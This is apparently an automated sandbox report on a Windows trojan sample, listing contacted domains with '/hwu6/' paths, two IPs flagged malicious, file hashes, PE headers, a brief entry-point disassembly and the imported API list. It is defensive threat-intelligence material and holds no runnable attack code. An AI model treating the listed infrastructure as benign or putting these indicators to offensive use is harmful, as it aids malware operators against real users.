                                                                                      http://www.energyecosystem.appexplorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://www.dangdut4dselalu.proexplorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://www.frozenpines.netexplorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://www.apoppynote.com/hwu6/www.victory88-pay.xyzexplorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.apoppynote.comexplorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://www.dangdut4dselalu.proReferer:explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://www.bethlark.top/hwu6/www.vytech.netexplorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://api.msn.com/qexplorer.exe, 00000002.00000002.2898200264.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1664931071.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.victory88-pay.xyzexplorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.6vay.boatsexplorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000002.00000002.2896132549.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1658360423.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.6vay.boats/hwu6/www.ffgzgbl.xyzexplorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://www.energyecosystem.app/hwu6/www.jeeinsight.onlineexplorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://www.vytech.net/hwu6/www.apoppynote.comexplorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://www.energyecosystem.app/hwu6/explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://www.suv-deals-49508.bondexplorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://www.jeeinsight.onlineexplorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://www.vibrantsoul.xyz/hwu6/explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://www.imxtld.club/hwu6/explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://www.7b5846.onlineexplorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://www.frozenpines.netReferer:explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://www.vytech.netexplorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://www.suarahati7.xyz/hwu6/explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://aka.ms/Vh5j3kexplorer.exe, 00000002.00000000.1658360423.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.inefity.cloudexplorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          • No. of IPs < 25%
                                                                                                          • 25% < No. of IPs < 50%
                                                                                                          • 50% < No. of IPs < 75%
                                                                                                          • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
185.53.179.91 | www.suv-deals-49508.bond | Germany | 61969 | TEAMINTERNET-ASDE | true
3.33.130.190 | energyecosystem.app | United States | 8987 | AMAZONEXPANSIONGB | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1586586
Start date and time: 2025-01-09 11:07:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 45s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: janacourse2.1.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@8/1@8/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 43
• Number of non-executed functions: 302
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 4.245.163.56, 20.109.210.53, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
05:08:00 | API Interceptor | 4359441x Sleep call for process: explorer.exe modified
Process: C:\Users\user\Desktop\janacourse2.1.exe
File Type: data
Category: dropped
Size (bytes): 189440
Entropy (8bit): 7.8716476882579505
Encrypted: false
SSDEEP: 3072:MKTs04lrOYKB32QWtdWMg0l6PD/Di05bEi4oamQn9YKDwdzV1neg3ojf5R7pqwA9:lY041OYq32QKAMg0l6zu05bEiqn9J0dp
MD5: E6BCBB6F32208A7971CFDED9A1AAF45D
SHA1: 745F741B3ADB3376EA2B4D9A0892318B804A6DDF
SHA-256: 1C730E6C7318726DEA9BB7F35946F5B7866B8BFEE2F60EEFA7E1946BBA9C464F
SHA-512: B2F1C0CE9C69E8F95F18A36E18FBFA154323489613D76CAFB8FB8BB965B14FBAC904C4E9DE0B0C08A93C38865B9CDDB8DCD40E188E2BBDFFD9B6325FC45CC649
Malicious: false
Reputation: low
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.989227375857467
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: janacourse2.1.exe
File size: 1'796'096 bytes
MD5: 9746b0e34b3a2048074caf932a112cc1
SHA1: 340bca56d23ea75d9e3e8e1e15b9a9bf8b051ef8
SHA256: 346d6afdb252d251ce95155e05789adf73f55994f94687286dc4a0fa95327090
SHA512: 0d628f7e5cd6f591a80a6b5d40e9b576bd9626b8e929802930c45e47156fe37669dd5989d6d0976ff4a720bf6ac8202dce51284e5e41c79b0164bdf183d8ab14
SSDEEP: 49152:UTvC/MTQYxsWR7a2idKVsULUcyufvHh3O:0jTQYxsWR7idKV9Lffh
TLSH: A085DF027391CD97FF6693324AEAF722167C6F6A5133E60F23943A79B970964013E613
File Content Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
Icon Hash: 173965717969338e
Entrypoint: 0x420577
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x677F1073 [Wed Jan 8 23:55:31 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 948cc502fe9226992dce9417f952fce3
                                                                                                          Instruction
                                                                                                          call 00007F3254BDF7A3h
                                                                                                          jmp 00007F3254BDF0AFh
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          push esi
                                                                                                          push dword ptr [ebp+08h]
                                                                                                          mov esi, ecx
                                                                                                          call 00007F3254BDF28Dh
                                                                                                          mov dword ptr [esi], 0049FDF0h
                                                                                                          mov eax, esi
                                                                                                          pop esi
                                                                                                          pop ebp
                                                                                                          retn 0004h
                                                                                                          and dword ptr [ecx+04h], 00000000h
                                                                                                          mov eax, ecx
                                                                                                          and dword ptr [ecx+08h], 00000000h
                                                                                                          mov dword ptr [ecx+04h], 0049FDF8h
                                                                                                          mov dword ptr [ecx], 0049FDF0h
                                                                                                          ret
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          push esi
                                                                                                          push dword ptr [ebp+08h]
                                                                                                          mov esi, ecx
                                                                                                          call 00007F3254BDF25Ah
                                                                                                          mov dword ptr [esi], 0049FE0Ch
                                                                                                          mov eax, esi
                                                                                                          pop esi
                                                                                                          pop ebp
                                                                                                          retn 0004h
                                                                                                          and dword ptr [ecx+04h], 00000000h
                                                                                                          mov eax, ecx
                                                                                                          and dword ptr [ecx+08h], 00000000h
                                                                                                          mov dword ptr [ecx+04h], 0049FE14h
                                                                                                          mov dword ptr [ecx], 0049FE0Ch
                                                                                                          ret
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          push esi
                                                                                                          mov esi, ecx
                                                                                                          lea eax, dword ptr [esi+04h]
                                                                                                          mov dword ptr [esi], 0049FDD0h
                                                                                                          and dword ptr [eax], 00000000h
                                                                                                          and dword ptr [eax+04h], 00000000h
                                                                                                          push eax
                                                                                                          mov eax, dword ptr [ebp+08h]
                                                                                                          add eax, 04h
                                                                                                          push eax
                                                                                                          call 00007F3254BE1E4Dh
                                                                                                          pop ecx
                                                                                                          pop ecx
                                                                                                          mov eax, esi
                                                                                                          pop esi
                                                                                                          pop ebp
                                                                                                          retn 0004h
                                                                                                          lea eax, dword ptr [ecx+04h]
                                                                                                          mov dword ptr [ecx], 0049FDD0h
                                                                                                          push eax
                                                                                                          call 00007F3254BE1E98h
                                                                                                          pop ecx
                                                                                                          ret
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          push esi
                                                                                                          mov esi, ecx
                                                                                                          lea eax, dword ptr [esi+04h]
                                                                                                          mov dword ptr [esi], 0049FDD0h
                                                                                                          push eax
                                                                                                          call 00007F3254BE1E81h
                                                                                                          test byte ptr [ebp+08h], 00000001h
                                                                                                          pop ecx
                                                                                                          Programming Language:
                                                                                                          • [ C ] VS2008 SP1 build 30729
                                                                                                          • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0xdfc08 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1b4000 | 0x7594 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xd4000 | 0xdfc08 | 0xdfe00 | 3f99a55ebeefb0af7bedd84ed857080f | False | 0.7009385032802904 | data | 7.130985410037135 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1b4000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xd45d8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xd4700 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xd4828 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xd4950 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 270336 | English | Great Britain | 0.32996641713761576
RT_ICON | 0x116978 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | Great Britain | 0.41837217555897316
RT_ICON | 0x1271a0 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | Great Britain | 0.5098276224511247
RT_ICON | 0x130648 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | Great Britain | 0.530452865064695
RT_ICON | 0x135ad0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | Great Britain | 0.5154700047236656
RT_ICON | 0x139cf8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5740663900414937
RT_ICON | 0x13c2a0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.5956848030018762
RT_ICON | 0x13d348 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | Great Britain | 0.6807377049180328
RT_ICON | 0x13dcd0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7455673758865248
RT_MENU | 0x13e138 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0x13e188 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0x13e71c | 0x68a | data | English | Great Britain | 0.2735961768219833
RT_STRING | 0x13eda8 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0x13f238 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0x13f834 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0x13fe90 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0x1402f8 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0x140450 | 0x7322c | data | | | 1.0003201893145828
RT_GROUP_ICON | 0x1b367c | 0x84 | data | English | Great Britain | 0.7196969696969697
RT_GROUP_ICON | 0x1b3700 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x1b3714 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x1b3728 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x1b373c | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x1b3818 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll | GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll | EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
